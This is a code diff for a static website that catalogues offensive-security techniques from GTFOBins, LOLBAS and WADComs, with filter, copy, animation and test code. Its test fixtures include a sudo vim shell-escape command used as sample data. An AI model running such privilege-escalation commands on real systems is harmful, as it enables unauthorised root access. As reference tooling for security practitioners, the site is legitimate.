node.getBoundingClientRect(); + if (reduced || !observer || rect.top < window.innerHeight * 0.95) run(node); + else observer.observe(node); + }); +} + /** A two-pixel signal line makes page position readable on the longer CPTS sheets. */ function initScrollProgress(): void { let progress = document.querySelector<HTMLElement>('[data-scroll-progress]'); @@ -386,6 +435,9 @@ function initTOC(): void { function init(): void { initTheme(); initMobileNav(); + initFuzz(); + initHero(); + initCounters(); initUnscramble(); enhanceCode(); enhanceCallouts(); diff --git a/src/scripts/catalog.ts b/src/scripts/catalog.ts @@ -1,74 +1,26 @@ -// The catalog island — a framework-free client filter over the full technique -// index. Imports the same pure filter/serialize logic the Astro pages use, so -// behaviour stays consistent. Fetches the static dataset from public/data. +// The catalog island — a framework-free client filter over the technique +// index. The first page and the facet rail are server-rendered by +// catalog.astro with the same renderers (src/lib/render-row.ts), so on a plain +// load the island adopts that markup and only fetches the slim list index +// (public/data/index-<hash>.json) to power filtering. +// +// History policy: a facet toggle, NEW, Clear are *intents* and push a history +// entry (Back undoes them one at a time); keystrokes in the search box replace +// the current entry so typing never spams the stack. `popstate` re-reads the +// URL, so deep links, Back and Forward all go through one path. import { - filtersFromSearch, filtersToSearch, filterTechniques, countActive, - EMPTY_FILTERS, toolRoute, type Technique, type CatalogFilters, + filtersFromSearch, filtersToSearch, filterTechniques, countActive, isEmpty, + EMPTY_FILTERS, type Technique, type CatalogFilters, } from '../lib/techniques'; import { - PLATFORMS, CAPABILITIES, SOURCES, PLATFORM_META, CAPABILITY_META, SOURCE_META, -} from '../lib/taxonomy'; -import { escapeHtml as esc, highlightCommand } from '../lib/highlight'; - -const BASE = import.meta.env.BASE_URL; -const url = (p: string) => `${BASE.replace(/\/$/, '')}/${p.replace(/^\//, '')}`; -const PAGE = 40; - -// ---- chips ----------------------------------------------------------------- -function chip(kind: string, value: string, label: string, accent: string, active: boolean, count: number): string { - return `<button type="button" class="cat-chip" role="checkbox" aria-checked="${active}" data-facet="${kind}" data-value="${esc(value)}" style="--acc: var(--${accent});"> - <span class="cat-chip__lbl">${esc(label)}</span><span class="cat-chip__n">${count}</span></button>`; -} - -function facetGroup(title: string, kind: string, values: string[], meta: (v: string) => string, active: string[], counts: Record<string, number>): string { - const chips = values.filter((v) => counts[v]).map((v) => chip(kind, v, v, meta(v), active.includes(v), counts[v] || 0)).join(''); - return `<section class="cat-facet"><p class="cat-facet__head eyebrow"><span class="eyebrow__mark">^:</span><span>${esc(title)}</span></p><div class="cat-facet__chips">${chips}</div></section>`; -} + PAGE, renderFacets, renderRow, haystack, countLabel, moreLabel, EMPTY_HTML, + type ListTechnique, type FacetCounts, +} from '../lib/render-row'; +import { url } from '../lib/url'; +import './copy'; // delegated [data-copy] handler; rows carry [data-cmdbar] -// ---- badges ---------------------------------------------------------------- -const badge = (label: string, accent: string, extra = '') => - `<span class="tbadge ${extra}" style="--acc: var(--${accent});">${esc(label)}</span>`; - -// ---- row ------------------------------------------------------------------- -function renderRow(t: Technique): string { - const caps = t.capability.map((c) => badge(c, CAPABILITY_META[c]?.accent || 'foam')).join(''); - const plats = t.platform.map((p) => badge(p, PLATFORM_META[p]?.accent || 'foam', 'tbadge--soft')).join(''); - const src = SOURCE_META[t.source]; - const srcBadge = badge(src.label, src.accent, 'tbadge--src'); - const newBadge = t.added ? `<span class="tbadge tbadge--new" style="--acc: var(--love);">NEW</span>` : ''; - const label = t.name && t.name !== t.toolName ? `<span class="trow__sub">${esc(t.name)}</span>` : ''; - const route = url(toolRoute(t.toolId)); - - const mitre = t.mitre?.length ? `<div class="tdetail__row"><span class="tdetail__k">MITRE</span><span class="tdetail__v">${t.mitre.map((m) => `<a href="https://attack.mitre.org/techniques/${m.replace('.', '/')}/" target="_blank" rel="noopener" class="tchip-link">${esc(m)}</a>`).join(' ')}</span></div>` : ''; - const req = t.requires?.length ? `<div class="tdetail__row"><span class="tdetail__k">Requires</span><span class="tdetail__v">${t.requires.map((r) => esc(r)).join(', ')}</span></div>` : ''; - const svc = t.services?.length ? `<div class="tdetail__row"><span class="tdetail__k">Services</span><span class="tdetail__v">${t.services.map((r) => esc(r)).join(', ')}</span></div>` : ''; - const fp = t.fullPath?.length ? `<div class="tdetail__row"><span class="tdetail__k">Path</span><span class="tdetail__v tdetail__v--mono">${t.fullPath.map((r) => esc(r)).join('<br>')}</span></div>` : ''; - const priv = t.privilege ? `<div class="tdetail__row"><span class="tdetail__k">Context</span><span class="tdetail__v">${esc(t.privilege)}</span></div>` : ''; - const det = t.detection?.length ? `<div class="tdetail__row"><span class="tdetail__k">Detection</span><span class="tdetail__v">${t.detection.map((d) => `${esc(d.type)}: ${/^https?:/.test(d.value) ? `<a href="${esc(d.value)}" target="_blank" rel="noopener">${esc(d.value.replace(/^https?:\/\//, ''))}</a>` : esc(d.value)}`).join('<br>')}</span></div>` : ''; - const refs = t.references?.length ? `<div class="tdetail__row"><span class="tdetail__k">Refs</span><span class="tdetail__v">${t.references.map((r) => `<a href="${esc(r)}" target="_blank" rel="noopener">${esc(r.replace(/^https?:\/\//, ''))}</a>`).join('<br>')}</span></div>` : ''; - const desc = t.description ? `<p class="tdetail__desc">${esc(t.description)}</p>` : ''; - const note = t.verifyNote ? `<p class="tdetail__note">✓ ${esc(t.verifyNote)}</p>` : ''; - - return `<article class="trow" data-id="${esc(t.id)}"> - <button class="trow__head" type="button" aria-expanded="false"> - <span class="trow__chev" aria-hidden="true">›</span> - <span class="trow__name"><a href="${route}" class="trow__tool">${esc(t.toolName)}</a>${label}</span> - <span class="trow__badges">${srcBadge}${newBadge}${caps}${plats}</span> - </button> - <div class="trow__cmdbar"> - <pre class="trow__cmd"><code>${highlightCommand(t.command)}</code></pre> - <button class="trow__copy" type="button" data-copy aria-label="Copy command">copy</button> - </div> - <div class="trow__detail" hidden> - ${desc}${note} - <div class="tdetail__grid">${priv}${mitre}${req}${svc}${fp}${det}${refs}</div> - </div> - </article>`; -} - -// ---- app ------------------------------------------------------------------- -function init(root: HTMLElement, all: Technique[]) { +function init(root: HTMLElement, all: ListTechnique[]) { const facetsEl = root.querySelector('[data-cat-facets]') as HTMLElement; const resultsEl = root.querySelector('[data-cat-results]') as HTMLElement; const countEl = root.querySelector('[data-cat-count]') as HTMLElement; @@ -77,56 +29,78 @@ function init(root: HTMLElement, all: Technique[]) { const clearEl = root.querySelector('[data-cat-clear]') as HTMLButtonElement; const moreEl = root.querySelector('[data-cat-more]') as HTMLButtonElement; - const counts = { - platform: {} as Record<string, number>, - capability: {} as Record<string, number>, - source: {} as Record<string, number>, - }; + const counts: FacetCounts = { platform: {}, capability: {}, source: {} }; + const hay = new Map<string, string>(); for (const t of all) { for (const p of t.platform) counts.platform[p] = (counts.platform[p] || 0) + 1; for (const c of t.capability) counts.capability[c] = (counts.capability[c] || 0) + 1; counts.source[t.source] = (counts.source[t.source] || 0) + 1; + hay.set(t.id, haystack(t)); } + const path = location.pathname; let filters: CatalogFilters = filtersFromSearch(location.search); let limit = PAGE; - - function renderFacets() { - facetsEl.innerHTML = - facetGroup('Platform', 'platform', PLATFORMS, (v) => PLATFORM_META[v as keyof typeof PLATFORM_META].accent, filters.platform, counts.platform) + - facetGroup('Capability', 'capability', [...CAPABILITIES], (v) => CAPABILITY_META[v]?.accent || 'foam', filters.capability, counts.capability) + - facetGroup('Source', 'source', SOURCES, (v) => SOURCE_META[v as keyof typeof SOURCE_META].accent, filters.source, counts.source); + let results: ListTechnique[] = []; + let rendered = 0; // rows currently in the DOM + + // Chips are built once (or adopted from the server); the chip counts are + // dataset totals, not contextual, so nothing about them changes when a + // filter flips. Toggling state in place (rather than rebuilding innerHTML) + // is what keeps keyboard focus on the chip that was just activated. + function syncControls() { + facetsEl.querySelectorAll<HTMLElement>('[data-facet]').forEach((btn) => { + const kind = btn.dataset.facet as 'platform' | 'capability' | 'source'; + btn.setAttribute('aria-checked', String(filters[kind].includes(btn.dataset.value || ''))); + }); newEl.setAttribute('aria-pressed', String(filters.addedOnly)); if (searchEl.value !== filters.query) searchEl.value = filters.query; } + function compute(): ListTechnique[] { + const base = filterTechniques(all as Technique[], { ...filters, query: '' }); + const q = filters.query.trim().toLowerCase(); + return q ? base.filter((t) => (hay.get(t.id) || '').includes(q)) : base; + } + + function updateMeta() { + countEl.innerHTML = countLabel(results.length, all.length, countActive(filters), filters.addedOnly); + const remaining = results.length - rendered; + moreEl.hidden = remaining <= 0; + if (remaining > 0) moreEl.textContent = moreLabel(remaining); + } + + /** Full re-render: recompute, replace the list. Collapses open rows — a filter changed. */ function render() { - const results = filterTechniques(all, filters); + results = compute(); const visible = results.slice(0, limit); - resultsEl.innerHTML = visible.map(renderRow).join('') || - `<div class="cat-empty"><p class="eyebrow" style="--acc: var(--love);"><span class="eyebrow__mark">^:</span><span>No matches</span></p><p>Nothing matches this filter. Loosen a facet or clear the search.</p></div>`; - const active = countActive(filters); - countEl.innerHTML = `<strong>${results.length}</strong> of ${all.length} techniques${active ? ` · ${String(active).padStart(2, '0')} facet${active > 1 ? 's' : ''}` : ''}${filters.addedOnly ? ' · NEW only' : ''}`; - const remaining = results.length - visible.length; - if (remaining > 0) { - moreEl.hidden = false; - moreEl.textContent = `Show ${Math.min(remaining, PAGE)} more · ${remaining} remaining`; - } else { - moreEl.hidden = true; - } + resultsEl.innerHTML = visible.map(renderRow).join('') || EMPTY_HTML; + rendered = visible.length; + updateMeta(); + } + /** "Show more": append the next page only, so rows already open stay open. */ + function renderMore() { + const from = rendered; + limit = from + PAGE; + const next = results.slice(from, limit); + resultsEl.insertAdjacentHTML('beforeend', next.map(renderRow).join('')); + rendered += next.length; + updateMeta(); } - function sync() { + function sync(push: boolean) { const qs = filtersToSearch(filters); - const path = location.pathname + (qs ? `?${qs}` : ''); - history.replaceState(null, '', path); + const next = path + (qs ? `?${qs}` : ''); + if (next === location.pathname + location.search) return; + if (push) history.pushState({ catalog: true }, '', next); + else history.replaceState(history.state, '', next); } - function apply(next: CatalogFilters) { + function apply(next: CatalogFilters, push = true) { filters = next; limit = PAGE; - sync(); - renderFacets(); + sync(push); + syncControls(); render(); } @@ -143,23 +117,29 @@ function init(root: HTMLElement, all: Technique[]) { let debounce: ReturnType<typeof setTimeout>; searchEl.addEventListener('input', () => { clearTimeout(debounce); - debounce = setTimeout(() => apply({ ...filters, query: searchEl.value }), 130); + debounce = setTimeout(() => apply({ ...filters, query: searchEl.value }, false), 130); }); newEl.addEventListener('click', () => apply({ ...filters, addedOnly: !filters.addedOnly })); clearEl.addEventListener('click', () => apply({ ...EMPTY_FILTERS })); - moreEl.addEventListener('click', () => { limit += PAGE; render(); }); + moreEl.addEventListener('click', renderMore); + + // Back / Forward (and a deep link pasted over this one) re-read the URL. + const onPop = () => { + if (!root.isConnected || location.pathname !== path) return; + filters = filtersFromSearch(location.search); + limit = PAGE; + syncControls(); + render(); + }; + window.addEventListener('popstate', onPop); + document.addEventListener('astro:before-swap', () => window.removeEventListener('popstate', onPop), { once: true }); - // Expand / collapse + copy (event delegation on the results list). + // Expand / collapse (event delegation on the results list). Copy is handled + // by the delegated [data-copy] listener in copy.ts. resultsEl.addEventListener('click', (e) => { const target = e.target as HTMLElement; - const copyBtn = target.closest('[data-copy]') as HTMLElement | null; - if (copyBtn) { - const row = copyBtn.closest('.trow') as HTMLElement; - const cmd = all.find((t) => t.id === row.dataset.id)?.command || ''; - copyText(cmd, copyBtn); - return; - } + if (target.closest('[data-copy]')) return; if (target.closest('.trow__tool')) return; // let the tool link navigate const head = target.closest('.trow__head') as HTMLElement | null; if (!head) return; @@ -171,21 +151,20 @@ function init(root: HTMLElement, all: Technique[]) { row.classList.toggle('trow--open', open); }); - renderFacets(); - render(); -} - -function copyText(text: string, btn: HTMLElement) { - const done = () => { const o = btn.textContent; btn.textContent = 'copied'; btn.classList.add('is-copied'); setTimeout(() => { btn.textContent = o; btn.classList.remove('is-copied'); }, 1400); }; - if (navigator.clipboard?.writeText) { navigator.clipboard.writeText(text).then(done).catch(() => fallback(text, done)); } - else fallback(text, done); -} -function fallback(text: string, done: () => void) { - const ta = document.createElement('textarea'); - ta.value = text; ta.style.position = 'fixed'; ta.style.opacity = '0'; - document.body.appendChild(ta); ta.select(); - try { document.execCommand('copy'); done(); } catch { /* noop */ } - document.body.removeChild(ta); + // Adopt the server-rendered rail and first page when the URL carries no + // filters: the markup came from the same renderers over the same data, so + // re-rendering would only flash. Anything else (a deep link) renders fresh. + if (facetsEl.dataset.ssr === undefined) facetsEl.innerHTML = renderFacets(filters, counts); + syncControls(); + if (resultsEl.dataset.ssr !== undefined && isEmpty(filters)) { + results = compute(); + rendered = resultsEl.querySelectorAll('.trow').length; + updateMeta(); + } else { + render(); + } + delete facetsEl.dataset.ssr; + delete resultsEl.dataset.ssr; } async function boot() { @@ -197,12 +176,13 @@ async function boot() { if (root.dataset.booted) return; root.dataset.booted = '1'; try { - const res = await fetch(url('data/techniques.json')); - const data = (await res.json()) as Technique[]; + const res = await fetch(root.dataset.indexUrl || url('data/techniques.json')); + if (!res.ok) throw new Error(`${res.status} ${res.statusText}`); + const data = (await res.json()) as ListTechnique[]; init(root, data); } catch (e) { - const results = root.querySelector('[data-cat-results]'); - if (results) results.innerHTML = `<div class="cat-empty"><p>Could not load the dataset. Run <code>npm run data</code> then rebuild.</p></div>`; + const count = root.querySelector('[data-cat-count]'); + if (count) count.innerHTML = `Could not load the index — filtering is unavailable. <code>npm run build:index</code> then rebuild.`; console.error('[catalog]', e); } } diff --git a/src/scripts/copy.ts b/src/scripts/copy.ts @@ -1,43 +1,50 @@ -// Wire copy-to-clipboard on any [data-copy] button. It copies the text of the -// nearest command block (`[data-cmdbar] .cmd code`). Used on the per-tool -// pages; the catalog island has its own copy path. +// Copy-to-clipboard for every [data-copy] button on the site — the per-tool +// pages and the catalog island share this one path. Delegated on `document` +// so rows rendered later (the catalog fetch, "Show more") need no re-wiring. +// The button copies the text of the nearest `[data-cmdbar] code`. -function copyText(text: string, btn: HTMLElement) { +export function copyText(text: string, btn: HTMLElement): void { const restore = btn.textContent; - const done = () => { - btn.textContent = 'copied'; - btn.classList.add('is-copied'); + const flash = (label: string) => { + btn.textContent = label; + btn.classList.toggle('is-copied', label === 'copied'); setTimeout(() => { btn.textContent = restore; btn.classList.remove('is-copied'); }, 1400); }; + const done = () => flash('copied'); + const failed = () => flash('failed'); if (navigator.clipboard?.writeText) { - navigator.clipboard.writeText(text).then(done).catch(() => fallback(text, done)); + navigator.clipboard.writeText(text).then(done).catch(() => fallback(text, done, failed)); } else { - fallback(text, done); + fallback(text, done, failed); } } -function fallback(text: string, done: () => void) { +function fallback(text: string, done: () => void, failed: () => void): void { const ta = document.createElement('textarea'); ta.value = text; + ta.setAttribute('readonly', ''); ta.style.position = 'fixed'; ta.style.opacity = '0'; document.body.appendChild(ta); ta.select(); - try { document.execCommand('copy'); done(); } catch { /* noop */ } + let ok = false; + try { ok = document.execCommand('copy'); } catch { ok = false; } document.body.removeChild(ta); + if (ok) done(); else failed(); } -function wire() { - document.querySelectorAll<HTMLElement>('[data-copy]').forEach((btn) => { - if (btn.dataset.wired) return; - btn.dataset.wired = '1'; - btn.addEventListener('click', () => { - const bar = btn.closest('[data-cmdbar]'); - const code = bar?.querySelector('.cmd code'); - copyText(code?.textContent || '', btn); - }); - }); +function onClick(e: Event): void { + const btn = (e.target as HTMLElement | null)?.closest<HTMLElement>('[data-copy]'); + if (!btn) return; + const bar = btn.closest('[data-cmdbar]'); + const code = bar?.querySelector('code'); + copyText(code?.textContent || '', btn); } -wire(); -document.addEventListener('astro:page-load', wire); +// Modules run once per JS context (the ClientRouter keeps it across +// navigations), so a module-level flag is the right double-bind guard. +let bound = false; +if (!bound) { + bound = true; + document.addEventListener('click', onClick); +} diff --git a/src/scripts/fuzz.ts b/src/scripts/fuzz.ts @@ -0,0 +1,188 @@ +// The signal field — the site's signature canvas texture, shared by the home +// hero and every section banner. Six pixel-sorted streak bands drifting on an +// additive blend plus bright filaments, looping seamlessly every nine seconds. +// +// Ported from daemon-sec.xyz's FuzzField. Four things are load-bearing and +// break the look if changed: the loop-global phase (so two plates on one page +// stay in step), the DPR backing (at 1× the streaks are 1–2px and upscaling +// blurs the pixel-sorted look), the erasure scrim, and the synchronous frame +// zero (rAF never fires in a hidden tab / print / screenshot). + +/** Band geometry — six streaks, three hues between them. `hue` is a *slot* + * (1 = iris, 2 = foam, 3 = love), not a colour: which colour a slot resolves + * to, and how it composites, is read from CSS at draw time so the field + * follows the mode along with everything else. */ +const BANDS = [ + { cy: 0.10, ch: 0.20, hue: 1, drift: 1, cyc: 1, dens: 12 }, + { cy: 0.34, ch: 0.24, hue: 2, drift: -1, cyc: 2, dens: 15 }, + { cy: 0.22, ch: 0.14, hue: 3, drift: 2, cyc: 1, dens: 9 }, + { cy: 0.60, ch: 0.22, hue: 2, drift: 1, cyc: 1, dens: 13 }, + { cy: 0.80, ch: 0.16, hue: 1, drift: -1, cyc: 2, dens: 10 }, + { cy: 0.92, ch: 0.14, hue: 3, drift: 1, cyc: 2, dens: 9 }, +] as const; + +interface Palette { + blend: GlobalCompositeOperation; + bands: [string, string, string]; + filaments: [string, string, string]; + gain: number; +} + +const FALLBACK: Palette = { + blend: 'lighter', + bands: ['196,167,231', '156,207,216', '235,111,146'], + filaments: ['224,222,244', '156,207,216', '196,167,231'], + gain: 1, +}; + +/** + * Resolve the palette off the canvas itself, so a plate inside a scope that + * pins the night palette draws the dark field even while the page around it is + * on paper. Channels come back space-separated from CSS and the 2D context + * wants them comma-separated, hence the normalise. + */ +function readPalette(cv: HTMLCanvasElement): Palette { + const cs = getComputedStyle(cv); + const channels = (name: string, fallback: string) => { + const v = cs.getPropertyValue(name).trim(); + return v ? v.replace(/\s+/g, ',') : fallback; + }; + const blend = cs.getPropertyValue('--fuzz-blend').trim(); + const gain = parseFloat(cs.getPropertyValue('--fuzz-gain')); + return { + blend: (blend || FALLBACK.blend) as GlobalCompositeOperation, + bands: [ + channels('--fuzz-band-1', FALLBACK.bands[0]), + channels('--fuzz-band-2', FALLBACK.bands[1]), + channels('--fuzz-band-3', FALLBACK.bands[2]), + ], + filaments: [ + channels('--fuzz-fil-1', FALLBACK.filaments[0]), + channels('--fuzz-fil-2', FALLBACK.filaments[1]), + channels('--fuzz-fil-3', FALLBACK.filaments[2]), + ], + gain: Number.isFinite(gain) ? gain : FALLBACK.gain, + }; +} + +/** One frame of the field at `phase` ∈ [0,1). Every band's drift and breathe is + * a whole number of cycles per loop, so the 9s loop seams cleanly and any two + * plates on the page stay in step. */ +function frame(cv: HTMLCanvasElement, phase: number, amt: number, pal: Palette): void { + const host = cv.parentElement; + const w = (cv.clientWidth || host?.clientWidth || 0) | 0; + const h = (cv.clientHeight || host?.clientHeight || 0) | 0; + if (!w || !h) return; + + const dpr = Math.min(2, devicePixelRatio || 1); + const bw = Math.round(w * dpr); + const bh = Math.round(h * dpr); + if (cv.width !== bw || cv.height !== bh) { cv.width = bw; cv.height = bh; } + + const ctx = cv.getContext('2d'); + if (!ctx) return; + ctx.setTransform(dpr, 0, 0, dpr, 0, 0); + + const frac = (x: number) => x - Math.floor(x); + const rnd = (s: number) => frac(Math.sin(s * 127.1) * 43758.5453); + + ctx.clearRect(0, 0, w, h); + ctx.globalCompositeOperation = pal.blend; + + for (let bi = 0; bi < BANDS.length; bi++) { + const b = BANDS[bi]; + const cy = b.cy * h; + const ch = b.ch * h; + for (let y = Math.max(0, Math.round(cy - ch)); y < Math.min(h, cy + ch); y += 2) { + const fall = 1 - Math.abs(y - cy) / ch; + const breathe = 0.5 + 0.5 * Math.sin(2 * Math.PI * (b.cyc * phase + y * 0.004 + bi * 0.3)); + const env = fall * (0.4 + 0.6 * breathe); + if (env <= 0.02) continue; + const n = Math.round(env * b.dens * amt); + for (let i = 0; i < n; i++) { + const s = y * 7.3 + i * 13.7 + bi * 101.3; + const x = frac(rnd(s) + phase * b.drift) * (w + 420) - 210; + const len = (18 + rnd(s + 1) * 340) * (0.4 + env); + const hx = 0.22 + 0.78 * Math.pow(Math.sin(Math.PI * ((x / w) * (1 + (bi % 3)) + phase + rnd(bi * 9))), 2); + const a = (0.06 + rnd(s + 2) * 0.34) * env * hx * 1.7 * pal.gain; + ctx.fillStyle = `rgba(${pal.bands[b.hue - 1]},${a.toFixed(3)})`; + ctx.fillRect(x, y, len, rnd(s + 3) > 0.84 ? 2 : 1); + } + } + } + + for (let i = 0; i < 54; i++) { + const s = i * 37.1; + const y = Math.round((rnd(s) * h) / 2) * 2; + const cyc = 1 + (i % 2); + const x = frac(rnd(s + 5) + phase * cyc) * (w + 700) - 350; + const a = (0.1 + rnd(s + 6) * 0.28) * amt * pal.gain; + ctx.fillStyle = `rgba(${pal.filaments[i % 3]},${a.toFixed(3)})`; + ctx.fillRect(x, y, 120 + rnd(s + 7) * 520, 1); + } + + // Scrim by erasure: destination-out bands at top and bottom so type near the + // plate edges always sits on clean ink. The percentage clamp matters — a + // fixed 40px erased most of the short plates. + ctx.globalCompositeOperation = 'destination-out'; + const solid = Math.min(40, h * 0.14); + const ramp = Math.min(26, h * 0.1); + ctx.fillStyle = 'rgba(0,0,0,1)'; + ctx.fillRect(0, 0, w, solid); + ctx.fillRect(0, h - solid, w, solid); + let g = ctx.createLinearGradient(0, solid, 0, solid + ramp); + g.addColorStop(0, 'rgba(0,0,0,1)'); + g.addColorStop(1, 'rgba(0,0,0,0)'); + ctx.fillStyle = g; + ctx.fillRect(0, solid, w, ramp); + g = ctx.createLinearGradient(0, h - solid - ramp, 0, h - solid); + g.addColorStop(0, 'rgba(0,0,0,0)'); + g.addColorStop(1, 'rgba(0,0,0,1)'); + ctx.fillStyle = g; + ctx.fillRect(0, h - solid - ramp, w, ramp); + ctx.globalCompositeOperation = 'source-over'; +} + +/** Density scale. The main site ships at 6; the constant exists for tuning. */ +const PRESS = 6; +/** The frame reduced motion keeps as the permanent texture — mid-loop, where + * the bands are at their fullest rather than at a seam. */ +const STILL = 0.3; + +/** Bind every unbound `[data-fuzz]` canvas on the page and start its loop. + * Idempotent — a second call skips already-bound canvases, so it is safe to + * call on every `astro:page-load`. */ +export function initFuzz(): void { + const canvases = document.querySelectorAll<HTMLCanvasElement>('[data-fuzz]:not([data-bound])'); + canvases.forEach((cv) => { + cv.dataset.bound = '1'; + const amt = Math.max(0.2, PRESS / 5); + const reduced = matchMedia('(prefers-reduced-motion: reduce)').matches; + + let pal = readPalette(cv); + + const still = () => frame(cv, STILL, amt, pal); + frame(cv, reduced ? STILL : (performance.now() / 9000) % 1, amt, pal); + + const ro = new ResizeObserver(() => { if (reduced) still(); }); + ro.observe(cv.parentElement ?? cv); + + const onMode = () => { pal = readPalette(cv); if (reduced) still(); }; + addEventListener('daemonmodechange', onMode); + + let raf = 0; + if (!reduced) { + const loop = (now: number) => { + frame(cv, (now / 9000) % 1, amt, pal); + raf = requestAnimationFrame(loop); + }; + raf = requestAnimationFrame(loop); + } + + document.addEventListener('astro:before-swap', () => { + cancelAnimationFrame(raf); + ro.disconnect(); + removeEventListener('daemonmodechange', onMode); + }, { once: true }); + }); +} diff --git a/src/scripts/hero.ts b/src/scripts/hero.ts @@ -0,0 +1,65 @@ +// The home hero controller — the deck ledger lights each of the four decks in +// turn on a loop. Point at a deck (or tab to it) and it takes the loop over; +// leave and the loop resumes. The stat counters are rolled up separately by +// initCounters() in app.ts (shared with the platform stats below the fold). +// +// Everything the hero shows is in the server-rendered markup, so with JS off it +// is a static, fully-legible ledger. This only adds the cycling, which collapses +// to a single lit deck under prefers-reduced-motion. Bound once per element and +// torn down on view-transition navigations. + +export function initHero(): void { + const hero = document.querySelector<HTMLElement>('[data-hero]'); + if (!hero || hero.dataset.heroBound) return; + hero.dataset.heroBound = '1'; + + const reduced = matchMedia('(prefers-reduced-motion: reduce)').matches; + const rows = Array.from(hero.querySelectorAll<HTMLElement>('[data-hero-row]')); + const blurbEl = hero.querySelector<HTMLElement>('[data-hero-blurb]'); + if (!rows.length) return; + + let active = 0; + let paused = false; + let timer = 0; + + const light = (i: number): void => { + active = ((i % rows.length) + rows.length) % rows.length; + rows.forEach((row, j) => { + const on = j === active; + row.classList.toggle('is-lit', on); + if (on) row.setAttribute('aria-current', 'true'); + else row.removeAttribute('aria-current'); + }); + const blurb = rows[active].dataset.blurb; + if (blurbEl && blurb) blurbEl.textContent = blurb; + }; + + const stop = (): void => { if (timer) { clearInterval(timer); timer = 0; } }; + const start = (): void => { + if (reduced) return; + stop(); + timer = window.setInterval(() => { if (!paused) light(active + 1); }, 3000); + }; + + rows.forEach((row, i) => { + const take = (): void => { paused = true; light(i); }; + const release = (): void => { paused = false; }; + row.addEventListener('mouseenter', take); + row.addEventListener('focusin', take); + row.addEventListener('mouseleave', release); + row.addEventListener('focusout', release); + }); + + // Pause the loop while the tab is hidden so it does not silently advance + // through several decks in the background and jump on return. + const onVis = (): void => { if (document.hidden) stop(); else start(); }; + document.addEventListener('visibilitychange', onVis); + + light(0); + start(); + + document.addEventListener('astro:before-swap', () => { + stop(); + document.removeEventListener('visibilitychange', onVis); + }, { once: true }); +} diff --git a/src/styles/global.css b/src/styles/global.css @@ -988,6 +988,25 @@ main, .site-header, .site-footer { position: relative; z-index: 2; } .mono { font-family: var(--font-mono); } .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; margin: -1px; overflow: hidden; clip: rect(0,0,0,0); white-space: nowrap; border: 0; } +/* Skip link — the first tab stop, hidden until focused, then it drops in over + the masthead so keyboard users can jump the nav straight to the content. */ +.skip-link { + position: fixed; + top: 0; + left: 0; + z-index: 200; + transform: translateY(-130%); + padding: 0.6rem 1rem; + background: var(--fg); + color: var(--base); + font-family: var(--font-mono); + font-size: 11px; + letter-spacing: var(--track-micro); + text-transform: uppercase; + transition: transform 160ms var(--ease-in); +} +.skip-link:focus-visible { transform: translateY(0); outline: 2px solid var(--accent); outline-offset: 2px; } + /* ---- Category chips ------------------------------------------------------ */ .cat-nav { display: flex; flex-wrap: wrap; gap: 1px; background: var(--rule); border: 1px solid var(--rule); } .cat-chip { diff --git a/test/_loadts.mjs b/test/_loadts.mjs @@ -0,0 +1,29 @@ +// Load a TypeScript module from src/ for node:test without any extra +// toolchain: esbuild (already a devDependency) bundles the entry — resolving +// the extensionless intra-lib imports that plain type-stripping cannot — and +// the result is imported as a data: URL. Same trick build-dataset.mjs uses for +// the WADComs additions. +import esbuild from 'esbuild'; +import { fileURLToPath } from 'node:url'; +import { dirname, resolve } from 'node:path'; + +const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..'); +const cache = new Map(); + +export async function loadTs(relPath, { base = '/' } = {}) { + const key = `${relPath}|${base}`; + if (cache.has(key)) return cache.get(key); + const { outputFiles } = await esbuild.build({ + entryPoints: [resolve(ROOT, relPath)], + bundle: true, + format: 'esm', + platform: 'neutral', + write: false, + logLevel: 'silent', + define: { 'import.meta.env.BASE_URL': JSON.stringify(base) }, + }); + const code = outputFiles[0].text; + const mod = await import('data:text/javascript;base64,' + Buffer.from(code).toString('base64')); + cache.set(key, mod); + return mod; +} diff --git a/test/highlight.test.mjs b/test/highlight.test.mjs @@ -0,0 +1,31 @@ +import { test } from 'node:test'; +import assert from 'node:assert/strict'; +import { loadTs } from './_loadts.mjs'; + +const { escapeHtml, highlightCommand } = await loadTs('src/lib/highlight.ts'); + +test('escapeHtml neutralises markup and attribute delimiters', () => { + const out = escapeHtml('<b onclick="x">&</b>'); + assert.ok(!out.includes('<')); + assert.ok(!out.includes('>')); + assert.ok(!out.includes('"')); + assert.equal(out, '&lt;b onclick=&quot;x&quot;&gt;&amp;&lt;/b&gt;'); + assert.equal(escapeHtml(123), '123'); +}); + +test('highlightCommand never emits raw input markup', () => { + const out = highlightCommand('echo <script>alert(1)</script> "a<b"'); + assert.ok(!/<script/.test(out)); + assert.ok(!out.includes('a<b')); + assert.ok(out.includes('&lt;script&gt;')); +}); + +test('highlightCommand token classes', () => { + const out = highlightCommand('sudo tar -cf /dev/null 10.10.10.10 | sh'); + assert.match(out, /<span class="tk-cmd">sudo<\/span>/); + assert.match(out, /<span class="tk-flag">-cf<\/span>/); + assert.match(out, /<span class="tk-num">10\.10\.10\.10<\/span>/); + assert.match(out, /<span class="tk-op">\|<\/span>/); + assert.equal(highlightCommand('# a comment'), '<span class="tk-muted"># a comment</span>'); + assert.equal(highlightCommand('a\nb').split('\n').length, 2); +}); diff --git a/test/techniques.test.mjs b/test/techniques.test.mjs @@ -0,0 +1,69 @@ +import { test } from 'node:test'; +import assert from 'node:assert/strict'; +import { loadTs } from './_loadts.mjs'; + +const lib = await loadTs('src/lib/techniques.ts'); +const { + toolSlug, toolNamespace, routeSourceOf, toolRoute, + matches, filterTechniques, countActive, isEmpty, + filtersToSearch, filtersFromSearch, EMPTY_FILTERS, +} = lib; + +const tech = (over = {}) => ({ + id: 'gtfo:vim:shell:0:sudo', toolId: 'gtfo:vim', toolName: 'vim', name: 'shell', + source: 'GTFOBins', platform: ['Linux'], capability: ['Execution', 'Privilege Escalation'], + nativeCategory: ['shell'], command: 'sudo vim -c \':!/bin/sh\'', mitre: ['T1059'], + references: ['https://gtfobins.github.io/gtfobins/vim/'], ...over, +}); + +test('toolSlug: namespace stripped, lowercased, non-alnum collapsed', () => { + assert.equal(toolSlug('gtfo:vim'), 'vim'); + assert.equal(toolSlug('wadcoms:Impacket-GetUserSPNs'), 'impacket-getuserspns'); + assert.equal(toolSlug('lolbas:Microsoft.Workflow.Compiler'), 'microsoft-workflow-compiler'); + assert.equal(toolSlug('daemon:--weird--'), 'weird'); +}); + +test('routing: namespace → deck route', () => { + assert.equal(toolNamespace('wadcoms:Certipy'), 'wadcoms'); + assert.equal(routeSourceOf('gtfo:vim'), 'GTFOBins'); + 